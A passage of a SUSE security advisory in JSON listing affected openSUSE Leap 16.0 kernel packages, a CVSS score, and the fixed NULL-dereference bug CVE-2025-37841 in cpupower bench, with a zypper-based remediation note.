"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-37751"
},
{
"cve": "CVE-2025-37841",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37841"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npm: cpupower: bench: Prevent NULL dereference on malloc failure\n\nIf malloc returns NULL due to low memory, \u0027config\u0027 pointer can be NULL.\nAdd a check to prevent NULL dereference.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37841",
"url": "https://www.suse.com/security/cve/CVE-2025-37841"
},
{
"category": "external",
"summary": "SUSE Bug 1242974 for CVE-2025-37841",
"url": "https://bugzilla.suse.com/1242974"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
